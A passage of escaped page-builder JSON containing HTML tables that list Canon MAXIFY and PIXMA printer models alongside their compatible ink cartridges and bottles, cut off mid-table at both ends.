(Matte Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Red)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY iB4170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5070<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5370<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5470<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E3170<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E410<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\",\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E4270<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E470<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E477<\\/td>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E480<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E510<\\/td>\\n<td>CL-98 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-88 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560<\\/td>\\n<td>CL-99 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-89 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560 \\/ E560R<\\/td>\\n<td>CL-99 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-89 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1000<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G2010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3000<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G4010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP100<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110 (with battery)<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA iP1300<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA iP2770 \\/ iP2772<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA iP2870S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA iP4200<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA iP7270<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA iP8770<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6770<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-755XXL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6870<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-755XXL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2570S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2577S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"  <table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n    <tbody>\\n    <tr>\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3570<\\/td>\\n      <td>CL-741 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-741XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740\\/CL-741 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3670<\\/td>\\n      <td>CL-741 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-741XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740\\/CL-741 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA MG7570<\\/td>\\n      <td>CLI-751 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP160<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP170<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP180<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP228<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-831 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-830 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP237<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP245<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP258<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP276<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <\\/tbody>\\n  <\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n  <tbody>\\n    <tr>\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"170\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP287<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP460<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP476<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-831 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-830 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP486<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP496<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP497<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP500<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 